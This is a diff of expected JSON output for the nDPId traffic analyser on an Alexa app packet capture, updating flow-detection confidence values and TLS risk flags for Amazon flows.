00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2558,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":1490976165120,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976165120,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwviBAAOcG4dk0XuiGrBAq2AG7m0ayU5bRPwIbbXASH\/4vqAAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2559,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":3,"flow_last_seen":1490976165122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976165122,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZadAAEAG4VusECrYNF7ohptGAbs\/AhttslOW0lAQAVd6GQAA"} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2560,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976165062,"flow_last_seen":1490976165125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976165125,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2561,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976165062,"flow_last_seen":1490976165190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976165190,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2560,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976165062,"flow_last_seen":1490976165125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976165125,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2561,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976165062,"flow_last_seen":1490976165190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976165190,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976169531,"flow_last_seen":1490976169531,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976169531,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1490976169531,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976169531,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8anRAAEAG3HqsECrYNF7ohrK4AbvvmuryAAAAAKAC\/\/9DtAAAAgQFtAQCCAoA9oCGAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2577,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1490976169726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976169726,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwhFlAAOcGG6E0XuiGrBAq2AG7srhwEXla75rq83ASH\/73zwAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":3,"flow_last_seen":1490976169729,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976169729,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoanVAAEAG3I2sECrYNF7ohrK4AbvvmurzcBF5W1AQAVdCQQAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2579,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976169531,"flow_last_seen":1490976169731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976169731,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2580,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976169531,"flow_last_seen":1490976169888,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976169888,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1490976044439,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":2175,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976041156,"flow_last_seen":1490976043655,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10376,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041384,"flow_last_seen":1490976042405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1098,"flow_tot_l4_payload_len":2371,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041400,"flow_last_seen":1490976042398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1490976044189,"flow_last_seen":1490976046415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1178,"flow_tot_l4_payload_len":6385,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1490976044219,"flow_last_seen":1490976046417,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":6417,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976044488,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":4402,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1490976044502,"flow_last_seen":1490976046415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1490976044509,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1490976044521,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1490976046418,"flow_last_seen":1490976048924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":9785,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1490976047096,"flow_last_seen":1490976048927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1490976041942,"flow_last_seen":1490976046399,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41433,"flow_avg_l4_payload_len":531,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976041961,"flow_last_seen":1490976042341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5681,"flow_avg_l4_payload_len":334,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2579,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976169531,"flow_last_seen":1490976169731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976169731,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2580,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976169531,"flow_last_seen":1490976169888,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976169888,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1490976044439,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":2175,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976041156,"flow_last_seen":1490976043655,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10376,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976041384,"flow_last_seen":1490976042405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1098,"flow_tot_l4_payload_len":2371,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976041400,"flow_last_seen":1490976042398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976044189,"flow_last_seen":1490976046415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1178,"flow_tot_l4_payload_len":6385,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976044219,"flow_last_seen":1490976046417,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":6417,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490976044488,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":4402,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976044502,"flow_last_seen":1490976046415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1490976044509,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1490976044521,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 